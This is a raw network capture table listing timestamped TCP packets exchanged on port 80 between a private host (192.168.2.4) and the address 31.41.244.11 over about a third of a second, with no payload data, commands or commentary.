Nov 30, 2024 04:06:11.266310930 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.266380072 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.266426086 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.267199993 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.267239094 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.267306089 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.267349005 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.268155098 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.268199921 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.268270016 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.268309116 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.269074917 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.269123077 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.269181967 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.269222975 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.270005941 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.270051003 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.270081043 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.270126104 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.270950079 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.270994902 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.271055937 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.271099091 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.271889925 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.271930933 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.272022009 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.272064924 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.272820950 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.272890091 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.272921085 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.272964001 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.273762941 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.273812056 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.273874998 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.273919106 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.274708033 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.274751902 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.274787903 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.274832010 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.275657892 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.275707006 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.275867939 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.275913000 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.276603937 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.276648998 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.276690006 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.276735067 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.277529955 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.277580976 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.277596951 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.277642012 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.278460979 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.278507948 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.278561115 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.278601885 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.279397011 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.279443026 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.279506922 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.279552937 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.280339003 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.280384064 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.280425072 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.280472040 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.281279087 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.281328917 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.281393051 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.281439066 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.282239914 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.282284975 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.282336950 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.282381058 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.283181906 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.283227921 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.283271074 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.283322096 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.284094095 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.284138918 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.284209013 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.284255028 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.285048008 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.285094023 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.285156965 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.285201073 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.286005020 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.286046982 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.286189079 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.286232948 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.286923885 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.286969900 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.287035942 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.287081003 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.287861109 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.287908077 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.287960052 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.288007975 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.288781881 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.288829088 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.288882971 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.288925886 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.289727926 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.289776087 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.289836884 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.289882898 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.290674925 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.290720940 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.290730000 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.290769100 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.291615963 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.291661024 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.291728973 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.291775942 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.292572021 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.292618036 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.292664051 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.292711020 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.293489933 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.293536901 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.293571949 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.293620110 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.379488945 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.379554987 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.379595041 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.379658937 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.379997015 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.380072117 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.380094051 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.380139112 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.380697966 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.380745888 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.380822897 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.380875111 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.381644964 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.381692886 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.381700993 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.381746054 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.440802097 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.440886974 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.440932035 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.440975904 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.441215992 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.441257954 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.441404104 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.441447020 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.442087889 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.442128897 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.442354918 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.442394018 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.443032980 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.443078041 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.443243980 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.443283081 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.444171906 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.444185019 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.444215059 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.444243908 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.444981098 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.445022106 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.445111990 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.445153952 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.445944071 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.445986032 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.446136951 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.446181059 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.446959019 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.447010040 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.447110891 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.447156906 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.447788000 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.447835922 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.447977066 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.448021889 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.448781013 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.448829889 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.448966026 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.449162960 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.449670076 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.449723959 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.449846983 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.449898005 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.450675011 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.450686932 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.450715065 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.450736046 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.451562881 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.451608896 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.451739073 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.451781034 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.452548981 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.452562094 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.452591896 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.452610016 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.453373909 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.453418016 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.453532934 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.453577042 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.454412937 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.454452038 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.454596043 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.454636097 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.455396891 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.455409050 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.455440044 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.456352949 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.456401110 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.456542969 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.456587076 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.457178116 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.457222939 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.457360029 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.457403898 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.458030939 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.458043098 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.458066940 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.458221912 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.458264112 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.458333969 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.458374023 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.459155083 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.459197998 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.459260941 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.459302902 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.460103035 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.460146904 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.460207939 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.460249901 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.461059093 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.461103916 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.461128950 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.461169958 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.462016106 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.462061882 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.462097883 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.462140083 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.462943077 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.462990046 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.463047028 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.463089943 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.463875055 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.463920116 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.463973999 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.464019060 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.464808941 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.464854002 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.464896917 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.464941025 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.465735912 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.465778112 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.465856075 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.465898991 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.466694117 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.466739893 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.466784954 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.466829062 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.467638016 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.467694044 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.467771053 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.467822075 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.471302986 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.471353054 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.471729040 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.471741915 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.471752882 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.471765995 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.471776962 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.471777916 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.471803904 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.471815109 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.472294092 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.472337961 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.472479105 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.472521067 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.473134041 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.473176956 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.473308086 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.473354101 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.474116087 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.474159956 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.474309921 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.474354029 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.475117922 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.475128889 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.475167990 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.476006985 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.476054907 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.476197958 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.476241112 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.476847887 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.476910114 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.477011919 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.477054119 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.477794886 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.477844000 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.477968931 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.478008986 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.478771925 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.478816986 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.478832006 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.478869915 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.478899002 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.478940964 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.479080915 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.479124069 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.479829073 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.479878902 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.479968071 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.480016947 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.480773926 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.480818987 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.480941057 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.480983973 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.481710911 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.481761932 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.481813908 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.481858015 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.482661963 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.482708931 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.482775927 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.482817888 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.483583927 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.483630896 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.483691931 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.483732939 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.484545946 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.484592915 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.484649897 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.484694958 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.485460997 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.485496998 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.485562086 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.485605001 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.571667910 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.571754932 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.571764946 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.571803093 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.572151899 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.572201967 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.572264910 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.572308064 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.573074102 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.573120117 CET	49765	80	192.168.2.4	31.41.244.11
